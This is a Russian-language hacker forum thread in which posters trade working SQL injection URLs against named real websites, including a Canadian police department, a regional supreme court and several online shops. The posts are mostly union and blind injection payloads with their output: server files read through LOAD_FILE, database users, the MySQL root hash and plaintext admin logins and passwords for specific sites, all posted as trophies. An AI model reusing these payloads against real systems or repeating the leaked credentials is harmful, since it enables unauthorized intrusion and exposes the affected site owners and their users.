SQL Инъекции

Code:

http://www.amazighworld.org/news/index_show.php?id=-1+union+select+1,concat_ ws(0 x3a,version(),database(),user( )),3,4,5,6,7,8,9,10,11,12,13,14,15--

Database Version : 4.0.24_Debian
Database name : amazighworld_org
User name : amazighworld_org@localhost

 

kusa.ca PR5

Code:

http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13/*

DBVer:4.1.20
User: root@localhost << Вот это я вообще не ожидал увидить, но это ладно! =) самое интересное еще впереди!!
DBName:desar01_cms

Работает чтение файлов...
/etc/passwd

Code:

http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/passwd'),5,6,7,8,9,10,11,12,13/*

/etc/httpd/conf/httpd.conf(от сюда видно, что кроме уязвимого есть на этом сервере еще несколько сайтов)

Code:

http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('etc/httpd/conf/httpd.conf'),5,6,7,8,9,10,11,12,13/*

Теперь посмотрим что за пользователи...

Code:

http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13+FROM+mysql.user/*

И тут оказывается что на root вообще нет пароля =))) Этому я нашел подтверждение, прочитав конфиг от местного форума:

Code:

http://www.kusa.ca/index.php?pid=11111'+UNION+SELECT+1,2,3,LOAD_FILE('/var/www/vs/forums.kusa.ca/Settings.php'),5,6,7,8,9,10,11,12,13/*

=)

 

Code:

http://emap.fm/ondemandpart.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),use r()),5,6, 7,8,9,10,11--

Database Version : 5.0.32 - Debian
Database name : emapfm
User name : emapfm@localhost

Code:

http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws( 0x3a,version(),database (),user()),13,14--

Database Version : 5.0.67
Database name : cms_admin
User name : root@localhost

берём админа:

Code:

http://www.fusionio.com/PressDetails.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ ws(0 x3a,user,password ),13,14+from+my sql.user+limit+0,1--

root:*31ECFA8D11EDEEB33BF4045DB0D8E5E158FD4A84 - пасс не расшифровал

 

Code:

http://sterlitamak.ru/arxnews.shtml?id=-880+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10/*

version: 4.0.24_Debian-10sarge2-log
user:adminstr@localhost
database:adminstr

 

tatsud.ru ВЕРХОВНЫЙ СУД РЕСПУБЛИКИ ТАТАРСТАН=)))

юзер - tatsud@localhost
БД - BDSUD
версия MySQL - 5.0.66a
P.s. дальше копаться совесть не позволила=))

 

abbypd.ca - PR5 - ABBOTSFORD POLICE DEPARTMENT =))) звоним 911 =)
MySQL Ver: 4.1.22

Code:

http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(version(),1,1)))=52  ->  4(ветка)

Я провел до конца брут и выяснил какой же точно версии...
User : apd@localhost

Code:

http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),1,1)))=97   -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),2,1)))=112  -> p
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),3,1)))=100  -> d
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),4,1)))=64   -> @
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),5,1)))=108  -> l
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),6,1)))=111  -> o
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),7,1)))=99   -> c
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),8,1)))=97   -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),9,1)))=108  -> l
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),10,1)))=104 -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),11,1)))=111 -> o
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),12,1)))=115 -> s
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(user(),13,1)))=116 -> t

DB : hh_apd

Code:

http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),1,1)))=104  -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),2,1)))=104  -> h
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),3,1)))=95	  -> _
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),4,1)))=97   -> a
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),5,1)))=112  -> p
http://abbypd.ca/index.php?page_id=149+and+ascii(lower(substring(database(),6,1)))=100  -> d

Еще один клиент... на том же хостинге.. =\
tourismabbotsford.ca - PR5
Уязвимость в:

Code:

http://www.tourismabbotsford.ca/index.php?page_id=291

MySQL Ver: 4.1.22
User : tourism@localhost
DB : hh_tourism

 

http://www.tv.myzone.ro/index.php?mid=13[SQL]


Version :5.0.45-log
Database: avatarul_tvmyzone
User: [email protected]



blind sql...bruted

 

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),1,1))=102 f

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),2,1))=116 t

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),3,1))=101 e

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),4,1))=64 @

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),5,1))=49 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),6,1))=57 9

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),7,1))=50 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),8,1))=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),9,1))=49 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),10,1))=54 6

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),11,1))=56 8

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),12,1))=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),13,1))=49 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),14,1))=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(user(),15,1))=51 3

[email protected]

***********************​

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),1,1))=53 5

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),2,1))=46 .

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),3,1))=48 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),4,1))=46 1

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),5,1))=50 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),6,1))=50 2

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),7,1))=45 -

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),8,1))=68 D

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),9,1))=101 e

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),10,1))=98 b

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),11,1))=105 i

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),12,1))=97 a

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),13,1))=110 n

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),14,1))=95 _

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),15,1))=48 0

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),16,1))=117 u

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),17,1))=98 b

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),18,1))=117 u

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),19,1))=110 n

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),20,1))=116 t

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),21,1))=117 u

http://www.fieldtripearth.org/div_index.xml?id=2+and+ascii(substring(version(),22,1))=54 6


5.2122
PS надоело)

 

http://www.bmxmagazin.ro/index.php?ref=2&categ1=-33+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7--



Database Version: 5.0.75-log
Database name: bmxmagazin_website
User name: bmxmagazin@localhost



всё сложнее найти скули в домене ро, но от этого факта мне еще интересне

 

вот тебе

Contemporary Romanian Writers

Code:

http://www.romanianwriters.ro/book.php?id=-9+union+select+1,2,concat(user(),0x3a,version(),0x3a,database())--

user(): romanian_svc@localhost
database(): romanian_svc 2
version(): 5.0.67-community

 

http://www.starmall.ro/magazin/?c=8&s=-34+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7

Version : 5.0.67-community
Database : starmall_db
User :starmall_star@localhost


я не говорил невозможно.....

 

Какой то самопальный двиг(PageRank: 4 тИЦ: 200):

HTML:

http://absolutist.ru/admin/generation/gen.game_float.php?gid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat_ws(0x3A,user(),@@version,database()),22,23,24,25,26,27,28,29,30&pid=-1

 

takafol.ru

юзер - takafol@localhost
бд - db_takafol
версия mysql - 4.0.23-standard

 

http://www.copycomputer.ro/index.php?ref=12&id=237+UNION+SELECT+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15--


Database Version: 5.0.67-community
Database name: copycomp_MySql
User name: copycomp@localhost


На сегодня все,спокойной ночи всем.

 

Книжный магазин

Code:

http://book.xadi.net/index.php?book=-19475%20union%20select%201,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11%20--

version::4.1.22-max
user::xadinet_xadi@localhost
database::xadinet_db

 

Code:

http://www.godwinart.com/two.php?id=-1194+union+select+1,version(),3,4,5,6,7,8--

5.0.67-community

немного искусства..

 

Федеральное Радио

http://www.federalnewsradio.com/index.php/www.defenselink.mil/mtom/index.php?nid=84&sid=-1433980+union+select+1,version()/*

version::5.0.32-Debian_7etch5-log
user::[email protected]
database::tags

 

Code:

http://www.ps2modchip.com.br/two.php?flag=noticias&id=-6+union+select+1,version(),3,4,5/*

4.0.27-locaweb-log

Code:

http://www.parceiraagronegocios.com.br/two.php?flag=informativo&id=-2+union+select+1,version(),3--

5.0.67-community

 

www.pulse-of-reason.ru Сайт какой-то Казанской рок-группы)

находим таблицу с админами:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),1,1))='112 = p
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),2,1))='117 = u
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),3,1))='108 = l
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),4,1))='115 = s
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),5,1))='101 = e
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),6,1))='111 = o
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),7,1))='102 = f
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),8,1))='114 = r
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),9,1))='101 = e
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),10,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),11,1))='115 = s
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),12,1))='111 = o
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),13,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),14,1))='95 = _
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),15,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),16,1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),17,1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),18,1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),19,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+table_name+FROM+information_schema.columns+WHERE+column_name=0x6c6f67696e),20,1))='0
з.ы. имена колонок с паролями и логинами посмотрел в сурсе страницы авторизации админа, очень часто они подходят)

логин админа:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),1,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),2,1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),3,1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),4,1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),5,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+login+FROM+pulseofreason_admin+limit+0,1),6,1))='0

пасс админа:
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),1,1))='97 = a
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),2,1))='100 = d
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),3,1))='109 = m
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),4,1))='105 = i
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),5,1))='110 = n
http://www.pulse-of-reason.ru/?page=29'+and+ascii(substring((SELECT+password+FROM+pulseofreason_admin+where+login=0x61646d696e),6,1))='0

логин - пасс второго админа: xernya - xernya

 

Магазин оргтехники 5-я ветка

Code:

http://www.05.ru/catalog.php?cid=47 union select 1,concat_ws(0x3a,admin_name,admin_pass),3,4,5,6 FROM admin_users limit 1,1 --

loginass
azim:4z1m


Ещё один магаз орг техники

Code:

http://www.ecopies.ru/showitem.php?itemid=99999+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10+FROM users+--

админка

Code:

http://ecopies.ru/admin/

login :: pass
admin :: ke21pud
можно поглумится ))